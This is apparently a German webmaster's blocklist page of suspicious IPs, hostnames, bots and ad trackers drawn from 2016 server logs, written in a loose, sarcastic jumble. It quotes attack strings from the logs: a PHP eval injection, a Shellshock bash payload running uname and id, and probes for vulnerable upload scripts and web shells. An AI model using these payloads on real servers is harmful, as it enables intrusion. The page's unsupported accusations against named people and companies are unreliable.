fo-p00-ob.rzone.de 81.169.144.135, guru.bookeazy.net wsb9.surf-town.net, 144.76.142.157 180.247.24.49 spammer?: static.157.142.76.144.clients.your-server.de, 198.204.238.170 185.129.148.190 79.125.182.56
  13. 158.69.237.99 - - [15/Nov/2016:02:26:29 +0100], my.skullix.com 121.42.205.30 c156nzay.mwprem.net 153.149.195.77 /administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=magic.php lästig metajob.crawler MetaJobBot // yuchwnq1112.com 195-154-255-203.rev.poneytelecom.eu static-5-2-131-96.rdsnet.ro 195.154.199.101, domain grabber: ns514167.ip-167-114-156.net support@domainreanimator.com 167.114.156.198 westfall.vps.webforyou.tv 178.33.32.230 /cfg-contactform-7/upload/bogel.php anazir.websterz.us 79.125.182.56 sasn.ru: http://www.google.com/{${eval(chr(100).chr(105).chr(101).chr(40).chr(39).chr(49).chr(55).chr(73).chr(53).chr(51).chr(48).chr(86).chr(65).chr(117).chr(52).chr(39).chr(41).chr(59))}} server1.extraitsolutions.com - - [15/Nov/2016:10:04:29 +0100] "GET /js/mage/cookies.js HTTP, aqua.cl-whc.net openflashchart 199.102.227.230 Sessler S.A. McLean USA @servint.com, VEB Erich Mielke Honecker Stasi wären froh wenn ... 78.185.153.246.dynamic.ttnet.com.tr 198.204.238.170 190-96-141-159.telebucaramanga.net.co 67.220.101.84.rev.sfr.net punkt.tr wie Trojaner ;-) (natürlich nicht) 94-224-185-134.access.telenet.be ns207895.ovh.net 92.98.126.219 site domain saetta.advanxedesign.net 37.59.106.49 ns412243.ip-37-187-141.eu 37.187.141.147 OVH scheint Spammer und Hacker magisch anzuziehen. 50.115.120.238 Hosting Services Inc. USA abuse@uk2group.com, 119.86.25.90 123.57.254.142 186.193.176.167.jupiter.com.br cpe-178-74-243-246.enet.vn.ua 17.11.2016 184.170.151.20 Los Angeles, 2ip.ru level-142.longfilton.net 195.154.237.11 92.98.126.219 61-31-89-198.static.tfn.net.tw 45.55.33.232, ns1.e-consultic.com 92.222.23.108 Consultic Marketing & Industrieberatung GmbH Röntgenstraße 4 D-W-63755 Alzenau info@consultic.com, Statistiken webalizer siehe ferienhof-wiesenblick.de 81.137.199.104.bc.googleusercontent.com - - [19/Nov/2016:19:23:22 +0100] 104.199.137.81 , 213.32.77.120 server.abbadcs.com 198.57.197.108 135-23-124-37.cpe.pppoe.ca mail.olan.com 213.8.153.132 JasperFitch.php?login=cmd sender14p6.offresduweb.fr 198.50.237.86 167.114.119.114 Stasi MfS MdI clients.highcontrast.ro Vampire Blutsauger ;-) 188.226.174.160 bm42401.dreamgest.it 62.201.211.35 customer.sharktech.net www.ora.nsysu.edu.tw vt1177.b2bdomain.com servidor.sexcoolture.com 185.129.148.190 voyager2.nokytech.fr 184.170.151.20 41.103.4.157 Polizei Meldestelle BSI

  14. 68.168.122.242 share.webindia.com esx01.v-token.tk yukjehuq1107.com 78.250.75.194 5x18x76x231.static-business.iz.ertelecom.ru 
    dedi-fr-37809.id-cloud.net server.clickaheadhost.com  86.34.179.190 1-90-92-178.pool.ukrtel.net 212.34.194.238 81.88.238.139 
    vlgdpq0609w-lp130-03-70-53-166-106.dsl.bell.ca mm-115-140-45-37.gomel.dynamic.pppoe.byfly.by 238-194-34-212.tnet.it 176.9.120.144
    server5.kobemedia.de 134.119.244.116 Stuttgart, 213.8.153.132 cloud 195.154.181.15, ca1.vpnbook.com 142.4.206.228 /_file-manager/php/connector.php 
    
    paine.lbseed.es yuchwnq1112.com 74.220.219.100 box500.bluehost.com shared.keurigonline36.nl apache server customlog 103.204.244.17 
    asiatische amerikanische Zomies, AS33387 Alexander Kabyshev 107.150.59.210 USA North Kansas City by DataShack, .htaccess 
    103.30.41.181 limit get put post head directory directive kehuqyuda.com sh2012.evanzo-server.de 87.238.192.12 static.144.120.9.176.clients.your-server.de 
    85.106.112.120 flash bug ms-comment.php?sh0w1 .php3 .php4 .php5 TC-Admin Login my.skullix.com:8889 185.100.223.37 5.135.73.217 
    
    mercury.promptit.net 2.237.119.98 46.30.45.77 i-market.ru Franzmänner "vpn" fake domain name, goldeneye excel makro macro mail.netplus.com.vn 
    [08/Dec/2016] poplavaem.ru melivn.gameti.net, tor20.quintex.com = 199.249.223.69, tor-exit.dhalgren.org 46.165.230.5, lh28409.voxility.net 
    politkovskaja.torservers.net 77.247.181.165 [08/Dec/2016:19:45:19 +0100] http://116.125.126.111/page.php 77.247.181.165 this.is.a.tor.node.xmission.com 
    s18455044.onlinehome-server.info = 217.160.140.109, tor-exit.altsci.com 125-44-15-51.rev.cloud.scaleway.com tor-exit-node-nibbana.dson.org 
    
    176.61.136.150 (reverse.proxy@interconnects.us) 91.108.178.164 185.44.79.232 121.42.54.54 vps.tengtools.com.au 136.243.185.141 
    Oh mit 195.126.85.201 The ministry of internal affairs of germany mal etwas "abgescheckt" (aus dem LAN des Deutscher Wetterdienst dwd)
    Frei übersetzt: Ministerium für interne Affären ;-)	
    sogar die "stasi" kommt zu Besuch: hostname "localhost" oder "." or "vpn"
    	
  15. paine.lbseed.es 192.111.150.218 webspace1.intervision-server.de 138.201.95.231 board static-148.244.114-x.digitalags.net vigap.com.mx ds8522.dreamservers.com 66.33.192.154 23.88.233.100 100.233-88-23.rdns.scalabledns.com 178-137-81-78-broadband.kyivstar.net 45.242.38.85 mail.netplus.com.vn 117.3.101.125 158.69.134.75 OVH.ca McGill College, ns.vertextek.com 5.135.138.135 42.96.190.11 s8.megaseed.pl=195.154.225.48/as12876.net 50.225.107.125, 199.15.233.162 Kamil Horynowski, 46.119.127.215 115-186-180-184.nayatel.pk 115.186.180.184 46.101.117.14 "curl/7.47.0" ccc 183.48.23.117 45.32.150.169.vultr.com shadow kehuqyuda.com 103.229.126.237 h2.webber.net.ua 193.227.210.62 mail.netplus.com.vn s16503481.onlinehome-server.info 217.160.176.77 [07/Dec/2016:12:45:57 +0100] jjjd.us 66.96.147.106 mercury.promptit.net 217.160.108.129 46.56.185.213 VELCOM hl661.dinaserver.com 82.98.139.162 static.144.120.9.176.clients.your-server.de 176.9.120.144 vebidoobot pagina.alandeags.com.mx EIN Schatten-NETZ: 184.175.244.215 Jacksonville Sheldon Ellis, internet der dinge 37.230.135.10 Spanien, 89.35.105.17 Tallin, 138.128.226.240 asmallwood@ipsystemslimited.com ns.vertextek.com 5.135.138.135 198.204.227.58 esx01.v-token.tk mm-8-93-215-37.mfilial.dynamic.pppoe.byfly.by 43.224.249.139 akl44.rev.netart.pl 85.128.142.44 intervenhosting.net am-nlhyv01.gsndns.com 46.101.117.14, 82.139.182.137 Polen: Politechnika Bialostocka nicolai1.timmeserver.de 136.243.93.126 und mal wieder 212-129-32-154.rev.poneytelecom.eu, www.comrace.ro 162.251.86.189 PDR 162.251.86.189 P.D.R Solutions LLC USA, audioknigi.club 109-93-195-239.dynamic.isp.telekom.rs 40.85.132.49 Microsoft 67.220.101.84.rev.sfr.net, Spionage Erpressung, 93.127.147.109 104.130.124.96 mail.pinnacletrades.in 216.144.241.154 www.comrace.ro shared.keurigonline36.nl 91.192.37.177, vi185-17-41-25.vibiznes.pl 185.17.41.25, host-103-206.radionet.com.ua 110-170-208-141.static.asianet.co.th /cgi-bin/php HTTP/1.1" 403 1036 "-" "() { foo;};echo; /bin/bash -c \"expr 299663299665 / 3; echo 333:; uname -a; echo 333:; id;\"" mx-ll-110-164-93-90.static.3bb.co.th esx01.v-token.tk intruders 198.204.238.170 1.180.237.96 shared.keurigonline36.nl 91.192.37.177 173.208.198.2 shop knacker Daten Diebe // magento-cy.nh-serv.co.uk [16/Dec/2016:14:20:55 +0100] 185.65.42.17 und Idioten vom "WebFuck ToP HackTeam" 210.91.40.66 // 160.202.163.124 118.199.148.177.isp.timbrasil.com.br 105.157.19.90
  16. pagina.alandeags.com.mx + static-148.244.114-x.digitalags.net 172.245.208.20 ip-167-114-237.eu + 167.114.237.30 200.199.225.142 198.204.227.58 148.244.114.243 .mx mx1.brassknuckless.com 43.224.248.60 [18/Dec/2016:00:02:50 +0100] 46.109.42.44/@lattelecom.lv dr-ulrike-ritter-verlag.de 85.214.198.3/Strato AG, vh91.sweb.ru 77.222.56.223/Russian SpaceWeb CJSC, 89.123.60.70 1seo.1seo.com 62-210-152-84.rev.poneytelecom.eu, usve78701.serverprofi24.com 50.30.47.146/AS30083 HEG US Inc.=server4you.de = godaddy-ubernimmt-host-europe-group müllbots: ptr.5x00.com ptr.ruvds.com 185.158.153.28 199.15.233.176 103.204.244.17 unspecified.mtw.ru 185.158.153.23 !! vm9.studio-web.be 37.59.169.249 195.22.127.115 151.237.178.36 86.164-245-23.rdns.scalabledns.com piterskiyua.example.com box177.rapidenet.ca 192.95.29.9 185.158.153.60 ptr.5x00.com 194.58.69.4 195.22.127.115 jacek@euronet.net.pl 155.133.82.230 173.208.198.2, www.notevault.net 74.208.163.8 =FakeDomain? slmp-550-123.slc.westdc.net 50.115.120.238 dns20.virtualns.net 37.247.120.71 usve78701.serverprofi24.com 50.30.47.146 54.169.28.184 ec2-54-169-28-184.ap-southeast-1.compute.amazonaws.com 178-137-87-242-broadband.kyivstar.net 212-129-32-154.rev.poneytelecom.eu 212.129.32.154 noc+ripe@as12876.net 133.205.171.23 ec2-54-169-28-184.ap-southeast-1.compute.amazonaws.com srv.jeaniologie.com verseuchte Rechner fl1-133-205-171-23.osk.mesh.ad.jp Spammer: gregoire.ribordy@idquantique.com 114.79.179.80.dvois.com

weiter in hakker4.htm
------------------------------------------------------------------------------------------- Virusmail mit Javascript/VBS/scripting/framework etc.: FC9461361341.js(asp.net)=FC9461361341.js invoice_scan_H8jkLt.js Trojaner-Mail Bsp. ab 03/2016 ------------------------------------------------------------------------------------------- Werbemüll Marketing-Spitzel cookie-schnüffler: sg.geodatenzentrum.de agonos.de tracking.m6r.eu cdn.stoeerdigitalmedia.de cse.google.com adticket.de assets.pinterest.com beacon.krxd.net tracker.vinsight.de ups.xplosion.de c.amazon-adsystem.com ad.yieldlab.net dyn.emetriq.de weblications.guj.de jsl.bri-img.de fonts.googleapis.com snapwidget.com scontent.cdninstagram.com cdnjs.cloudflare.com js-agent.newrelic.com code.jquery.com fls-eu.amazon.de stats.warenform.de script.ioam.de de.ioam.de blog.ivwbox.de static.addtoany.com ad2.adfarm1.adition.com adfarm1.adition.com ups.xplosion.de dmp.theadex.com cdn.adrtx.net widget.whatsbroadcast.com count.spiegel.de static.plista.com farm.plista.com 4stats.de welt.met.vgwort.de ww251.smartadserver.com y.analytics.yahoo.com google-analytics.com html5shim.googlecode.com s3.amazonaws.com aws.amazon.com cdn.knightlab.com track.adform.net tags.mathtag.com googleads.g.doubleclick.net www.trustedshops.com s62.mxcdn.net www.googletagmanager.com api.mapbox.com zeit.met.vgwort.de zeit01.webtrekk.net ------------------------------------------------------------------------------------------- ------------------------------------------------------------------------------------------- müllilge crawler und irre Roboter: grabber und Co. fsinf-lf01.uni-duisburg.de (JAVA) 134.91.30.112@uni-duisburg.de www.jugendschutzprogramm.de 83.220.141.202 bzq-82-80-249-158.dcenter.bezeqint.net 82.80.249.158 bzq-82-80-249-158.dcenter.bezeqint.net Adress-Sammler: 212.21.66.6 (Berlin) beehive.de ebuero.de im-netz.de cloud.google.com 172.217.21.14, vps-1198978-9729.cp.az.pl Hacker? shop-scanner 46.41.133.43 74.91.26.114 chinabank öööiAinArbeitTAG crawl-66-249-64-49.googlebot.com - - [19/Feb/2016:00:18:07 +0100] "GET /?frameRegionalLocation=true Dumm-BOT: 84.3.7.235 [05/Jan/2016] 540307eb.catv.pool.telekom.hu 188.143.232.24 166.62.88.223 secureserver.net HEAD /wp-trackback.php jobqueue-listener.jobqueue.netcraft.com-u7a133df469f741c7997ee0ba58eb0617u-digitalocean-2gb crawl09@007ac9.net 37.59.55.128 ImplisenseBot, doesnotexi.st 148.163.189.39, c-6.cnet.host negativ1.htm: allinkl.com münnich: vrx.kasserver.com 85.13.159.250 188-143-232-13.server.com 180.166.92.231 213.61.218.52 fulltextrobot-77-75-78-171.seznam.cz majestic12.co.uk vrx.kasserver.com 85.13.159.250 webgw11.arbeitsagentur.de 195.88.117.25 BRD-USA-Amtsstube: 150-70-173-10.trendmicro.com v32502.1blu.de 178.254.37.5 orion2775.server4you.de static.84.48.243.136.clients.your-server.de crawl16.lp.007ac9.net 37.187.24.36 serveur.infoconcours.com mfs stasi nsa 195.146.6.111 88.198.217.231 proxy-109-190-254-12.ovh.net boson094.ahrefs.com 195.88.117.166 50.18.94.121 amazon-network amazonaws.com 195.243.139.166 AhrefsBot ahrefs.com 23.81.242.248.rdns.as15003.net 81.192.187.207 miss3.securityspace.com scanner ip-8-110.dataclub.biz 185.29.8.110, stupid marketer 178-137-85-56-lvv.broadband.kyivstar.net 41.142.113.242 149.202.7.202 vrx.kasserver.com 85.13.159.250 =allinkl all-inkl rene münnich crawl04.lp.007ac9.net 188.165.234.52 ns3026440.ip-51-255-65.eu AhrefsBot 46.105.98.166 84.3.7.235 google-Fälscher: 80.137.149.199 p508995c7.dip0.t-ipconnect.de 117-142-112-185.users.tritel.net.ru crawl13.lp.007ac9.net 188.165.196.25 bot.thumbshots.de 540307eb.catv.pool.telekom.hu Java/1.8.0_66 ec2-52-28-146-95.eu-central-1.compute.amazonaws.com Apache-HttpClient/4.5.1 (Java/1.8.0_60) ip-83-134-100-201.dsl.scarlet.be ip-8-110.dataclub.biz ... 46.37.84.252 104.236.107.194 address grabber: peoplecheck.de 136.243.148.173 crawl01.lp.007ac9.net 188.165.233.228 loft2539.dedicatedpanel.com jobboerse.com/bot.htm 85.25.236.93, static-ip-188-138-41-208.inaddr.ip-pool.com 188.138.41.208 +spider@seoscanners.net spider@seoscanners.net static.198.153.76.144.clients.your-server.de host51-35.etanet.se crawl14.lp.007ac9.net mail.binmail.de hydrogen038.ahrefs.com spammer-bots?: 104.236.107.194 OpenLinkProfiler.org semrush.com 192.243.55.138 static.81.106.9.5.clients.your-server.de ------------------------------------------------------------------------------------------- seltsam: uploader.play-aa.net ipbcc09610.dynamic.kabel-deutschland.de server.click-business.de gruppe: 149.202.7.203 nl4-evs1.wc0.pw c999944268-cloudpro-893830726.cloudatcost.com 64.137.238.13 caius.ubidesktop.com 136.243.154.203 ------------------------------------------------------------------------------------------- botnet 89.247.113.222 88.73.28.203 88.72.189.91 84.191.3.107 88.75.61.15 77.6.149.78 und: 92.225.2.103 91.55.183.245 88.75.191.140 88.73.26.237 77.12.27.76 mit: "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36" Teil eines häkker-netzwerk, part of crack-network 31.184.238.132 85.112.15.201 ?: vs76609.vds.pw aus Frankreich crawl16.lp.007ac9.net 188.165.233.34 HOST: jobqueue-listener.jobqueue.netcraft.com-u7791ceeea241469aa7f1ea2f69666c97u-digitalocean-2gb 192.243.55.131 SemrushBot/1~bl; +http://www.semrush.com/bot.html 3xp.php 83.233.207.74 cmscrawler.com Stratagems Kumo spider@seoscanners.net Nervensägen? nein ööö sonstige: kein häcker: allinkl.münnich: vrx.kasserver.com 85.13.159.250 (siehe negativ) -------------------------------------------------------------------------------------------



this is: /public/hakker3.htm
vorher hakker2.htm

logfile1.htm
Whistleblower

Von Werbefirmen und Co. manipulierte Foren (angebliche Verbrauchertests)/Fakes